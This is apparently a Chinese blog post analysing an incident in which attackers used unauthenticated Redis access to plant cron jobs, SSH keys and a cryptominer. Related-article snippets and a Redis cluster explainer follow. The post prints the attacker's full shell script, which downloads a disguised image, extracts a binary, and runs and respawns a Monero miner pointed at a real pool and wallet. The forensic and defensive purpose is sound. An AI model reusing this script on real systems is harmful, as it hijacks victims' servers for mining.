【应急响应】————5、redis未授权访问

最新推荐文章于 2025-03-10 12:14:39 发布
最新推荐文章于 2025-03-10 12:14:39 发布
阅读量539 收藏
点赞数
分类专栏: 【应急响应】 # Linux应急响应
攻击者利用Redis未授权访问,植入挖矿程序并设置定时任务持续运行。文章详细介绍了攻击过程,包括SSH后门创建、异常进程检测及攻击脚本分析。处理措施包括增加Redis认证、清理恶意文件及修复系统安全。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

简介

攻击者通过Redis未授权访问,写入定时任务,执行挖矿程序。

排查过程

检查进程发现SSH后门

发现异常进程

PS中看到很多定时任务进程CROND,crontab -l发现又是redis写进来的,那么再看下/root/.ssh/authorized_keys,果然也写了免登陆。

发现攻击者使用的脚本http://104.156.239.160:8080/conn.sh
脚本内容如下:

#!/bin/sh
ps -fe|grep conns |grep -v grep
if [ $? -ne 0 ]
then
echo "start process....."
wget https://ooo.0o0.ooo/2017/01/15/587b626883fdc.png -O /tmp/conn
dd if=/tmp/conn skip=7664 bs=1 of=/tmp/conns
chmod +x /tmp/conns
nohup /tmp/conns -B -a cryptonight -o stratum+tcp://xmr.crypto-pool.fr:3333 -u 44xdB6UmabC8R69V6jDj7q1zGyDzJ7ks5GJpLs3b2HpqWwWq2xbvLKiRjmX8e9oy7426goZG9kXRTgHj9SZPGzfiQYtbTw1 -p x >/dev/null 2>&1 &
else
echo "runing....."
fi

sleepTime=20

while [ 0 -lt 1 ]
do
ps -fe| grep conns | grep -v grep 
if [ $? -ne 0 ]
then
echo "process not exists ,restart process now... "
wget https://ooo.0o0.ooo/2017/01/15/587b626883fdc.png -O /tmp/conn
dd if=/tmp/conn skip=7664 bs=1 of=/tmp/conns
chmod +x /tmp/conns
nohup /tmp/conns -a cryptonight -o stratum+tcp://xmr.crypto-pool.fr:3333 -u 44xdB6UmabC8R69V6jDj7q1zGyDzJ7ks5GJpLs3b2HpqWwWq2xbvLKiRjmX8e9oy7426goZG9kXRTgHj9SZPGzfiQYtbTw1 -p x >/dev/null 2>&1 & 
echo "restart done ..... "
else
echo "process exists , sleep $sleepTime seconds "
fi
sleep $sleepTime
done

首先下载了一个图片,然后通过dd提取出来挖矿程序。

然后每20S检查一下进程是否存活。
这种通过Redis未授权拿服务器挖矿的情况很常见。

处理过程

1)redis增加认证,清空/var/spool/cron/root和authorized_keys。
2)删除后门
3)Kill异常进程
4)重启

 

 

 

网络安全从入门到精通(特别篇I):Linux安全事件应急响应之Linux应急响应基础必备技能
HACKONE的博客
04-10 1167
awk 首先将每条日志中的IP抓出来,如日志格式被自定义过,可以 -F 定义分隔符和 print指定列;
五、高并发系统降级巧计——降级预案理论分析
流楚丶格念的博客
08-22 954
例如,电子商务平台的降级策略包括首先降级页面的非核心部分(如广告和推荐模块),接着降级页面的异步请求(如实时库存查询),最后如果压力仍然过大,则启动服务级降级(如限制订单处理功能),以保护核心购物流程的稳定性。通过合理设计和实施降级策略,结合有效的监控与告警系统、详尽的文档和培训、以及平衡的降级与恢复策略,可以有效保护高并发系统的核心功能,提高系统在面对突发情况时的稳定性和可靠性。例如,社交网络应用中,系统会将用户评论暂存到缓存中,并异步更新到数据库,减少对数据库的即时写入压力,保证用户评论功能的可用性。
应急响应,2022.12.14 因为redis未授权被干
Cfoxer的博客
12-15 258
redis未授权被利用,应急响应
玄机-第二章 日志分析-redis应急响应
JACKBREAK的博客
05-19 2676
应急响应-redis入侵应急响应
redis远程连接不上_Redis未授权访问漏洞复现及应急响应
weixin_39590453的博客
12-15 486
一、Redis未授权漏洞复现Redis安装好后如果更改配置文件中的可访问IP地址为0.0.0.0。就会使redis暴露在公网或内网中。如果没有在配置文件中设置连接口令,就可导致任意用户在可访问目标服务器的情况下利用未授权访问redis或读取redis的数据。影响范围:Linux,Windows漏洞危害:获取数据库敏感信息及服务器权限。1、redis未授权访问漏洞在Linux上的复现1.1...
玄机靶场练习-redis应急响应
sucker的博客
03-10 853
4,通过本地 PC SSH到服务器并且溯源分析黑客的用户名,并且找到黑客使用的工具里的关键字符串(flag{黑客的用户-关键字符串} 注关键字符串 xxx-xxx-xxx)。权限为-rwxrwxrwx可能表明被人为更改过。查看系统的认证日志(如/var/log/auth.log或/var/log/secure),寻找异常的登录记录,特别是来自非授权用户或IP的登录尝试。2,查找黑客执行过的恶意脚本文件,通过第一阶段的日志分析和对redis主从复制攻击的了解,攻击者会利用漏洞执行一个.so实现攻击。
玄机——第二章日志分析-redis应急响应 wp
焦虑的焦虑
06-27 3779
第二章日志分析-redis应急响应
Linux应急响应——知攻善防应急靶场
qq_42494313的博客
01-24 1296
攻击者IP定位:此次攻击源自IP地址为192.168.20.1的设备。攻击手段解析:攻击者首先利用/index.php?这一漏洞,上传了一个webshell。随后,通过蚁剑工具对该webshell进行管理,并进一步上传了名为的文件,以实现权限提升。数据库安全受损:攻击者不仅成功入侵,还修改了phpMyAdmin数据库中管理员的密码,进一步加剧了安全威胁。系统篡改与清理:在获得系统权限后,攻击者采取了多项行动,包括关闭防火墙服务以削弱系统防御能力,并删除了提权文件和名为flag1的文件,以掩盖其入侵痕迹。
应急响应——Linux入侵排查
negnegil的博客
09-16 9343
事件响应可以定义为每当发生计算机或网络安全事件时所采取的行动过程。作为事件响应者,您应该始终了解系统中应该出现和不应该出现的内容。 排查思路 (1)首先监测用户账号安全,比如新增的账号、可疑账号,重点查看可以远程登录的账号以及高权限账号。 (2)利用linux的history指令查看历史linux指令,uptime指令查看登录多久、多少用户。 (3)检查异常端口和进程,netstat检查异常端口,ps检查异常进程,可以观看资源占用的进程id来判断是否有挖矿木马等嫌疑。 (4)检查linux的启动项和系统的
Redis——redis配置与优化
ML908的博客
03-24 1370
文章目录一、关系数据库与非关系型数据库1、关系型数据库2、非关系型数据库二、 Redis 简介1、Redis的应用场景2、Redis的优点三、Redis 安装部署1、安装Redis2、配置参数四、Redis 命令工具1. redis-cli 命令行工具2、redis-benchmark 测试工具五、Redis 数据库常用命令1、key 相关命令2. 多数据库常用命令六、Redis持久化1、持久化概...
RedisMiner应急
weixin_33701564的博客
01-02 173
转载来自:https://blog.51cto.com/bantu/2055465 1、关闭访问挖矿服务器访问 [root@fuwuqi~]# iptables -A INPUT -s xmr.crypto-pool.fr -j DROP [root@fuwuqi~]# iptables -A OUTPUT -d xmr.crypto-pool.fr -j DROP -a 表示附加 inpu...
第二章日志分析-redis应急响应
SS_liang的博客
07-24 1020
黑客通过多次尝试,最终成功将从节点配置为复制192.168.100.20:8888,并通过该连接植入了恶意模块。这表明,IP地址192.168.100.20是黑客成功攻击的目标。
玄机第二章日志分析-redis应急响应
m0_64053653的博客
07-11 424
1、通过本地 PC SSH到服务器并且分析黑客攻击成功的 IP 为多少,将黑客 IP 作为 FLAG 提交;2、通过本地 PC SSH到服务器并且分析黑客第一次上传的恶意文件,将黑客上传的恶意文件里面的 FLAG 提交;3、通过本地 PC SSH到服务器并且分析黑客反弹 shell 的IP 为多少,将反弹 shell 的IP 作为 FLAG 提交;
应急响应】————6、反弹shell+redis
Fly_鹏程万里
02-22 765
0x01 背景 2017.3.27中午运维反应怀疑zabbix所在服务器被入侵。 0x02 排查过程 ps查看进程,发现端口反弹行为 查看进程启动时间发现为Feb 27,启动账户为Root。 查看/sbin /usr/bin /usr/sbin /bin 发现sshd Mtime为Feb 27,可以确认此时的SSH已经被植入后门,一般的SSH后门比较容易发现,功能如下: 1)如果...
未授权访问:ZooKeeper 未授权访问漏洞
qq_68163788的博客
05-15 4696
zookeeper是分布式协同管理工具,常用来管理系统配置信息,提供分布式协同服务。 Zookeeper的默认开放端口是2181。 Zookeeper安装部署之后默认情况下不需要任何身份验证,造成攻击者可以远程利用Zookeeper,通过服务器收集敏感信息或者在Zookeeper集群内进行破坏(比如:kill命令)。攻击者能够执行所有只允许由管理员运行的命令。
zookeeper未授权漏洞复现及处理
kofterry的专栏
09-18 4106
不知道你有没有注意,zk服务端启动后,默认会启动这几个具有world和cdrwa权限的znode,“/” "/zookeeper" "/zookeeper/config"和"/zookeeper/quota"(根据zookeeper的版本不同可能存在不同,并且这几个节点虽然具有world和cdrwa权限,但是是无法删除的,不知道为什么,好在我们可以给它设置ACL列表。重要的是构建环境把我在配置文件配置的user信息给删掉了(我不知道)才开始跑的,更坑的是它运行完后直接清除日志了,哪里错了都看不到。
zookeeper未授权访问漏洞修复
weixin_43966996的博客
05-08 5665
zookeeper进行服务ACL限制访问
修复zookeeper未授权访问漏洞
qq_28392947的博客
01-12 3552
【代码】修复zookeeper未授权访问漏洞。
redis集群分为哪几种模式
最新发布
03-22
### Redis 集群的工作模式及其特点 Redis 提供了多种集群工作模式来满足不同的应用场景需求。以下是几种常见的 Redis 集群模式及其各自的特点: #### 1. **服务器端分片(Server-side Sharding)** 服务器端分片是 Redis 官方推荐的集群分片技术,主要通过 Redis Cluster 实现[^1]。 - 数据分布:Redis Cluster 使用哈希槽的概念将所有的键映射到 16384 个 slot 中,每个 Redis 节点负责一部分 slot 的存储。 - 请求处理:客户端可以直接连接任意节点发起请求,如果目标数据不在当前节点上,该节点会自动引导客户端跳转至正确的节点获取数据。 - 特点: - 支持动态扩展和收缩节点数量。 - 自动化故障检测与恢复功能。 - 所有节点间通过 Gossip 协议定期交换状态信息以保持一致性。 #### 2. **主从复制模式下的集群架构** 在这种模式下,通常采用多组主从结构组成整个集群体系[^2]。 - 架构设计:每两个服务器配置为主从关系构成一个小单元,再由若干这样的小单元共同构建起大规模的分布式环境。 - 写入平衡:利用主从同步机制,在一定程度上缓解单点压力问题从而达到负载均衡的效果。 - 故障转移:当某个 master 出现异常时能够快速切换到对应的 slave 上继续提供服务保障系统的高可用性。 #### 3. **代理分片方案 (Proxy-based sharding)** 此方法借助外部工具完成对内部 redis 实例池子访问路径的选择判断过程[^4]。 - 工作原理:引入一层额外的服务层——即所谓的“代理”,它接受来自前端应用程序的各种查询指令之后依据预定义好的规则决定应该转发给哪一台具体的redis server执行实际的操作最后把结果反馈回去即可。 - 技术选型建议:目前市面上已经存在不少成熟的解决方案可供选择比如Twemproxy 和 Codis 等都是不错的选择项之一;它们不仅简化了开发难度同时还提高了运维效率降低了成本开支等方面都有显著优势表现出来值得考虑采纳实施部署使用当中去实践检验效果如何进一步优化改进现有流程提高整体性能指标水平等等一系列措施手段相结合综合考量分析得出结论最终实现预期目标达成共识推动项目向前发展迈进一大步! #### 4. **Sentinel 哨兵监控系统** 虽然严格意义上来说不属于一种独立存在的 “模式”,但是由于其在整个生态链里扮演着极其重要的角色地位所以单独拿出来讨论一下也是很有必要的[^5]: - 功能概述:主要用于实时监测各个成员的状态变化情况(包括但不限于master/slave的角色转换事件通知等),并通过设置合理的阈值参数触发相应的应急响应策略动作,确保即使是在极端恶劣条件下也能维持正常运转不中断对外界用户提供持续稳定可靠的服务体验感受. --- ```python import rediscluster # 创建 Redis Cluster 连接示例 startup_nodes = [{"host": "127.0.0.1", "port": "7000"}] rc = rediscluster.RedisCluster(startup_nodes=startup_nodes, decode_responses=True) # 设置键值对 rc.set("foo", "bar") # 获取键值对 value = rc.get("foo") print(value) ```
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值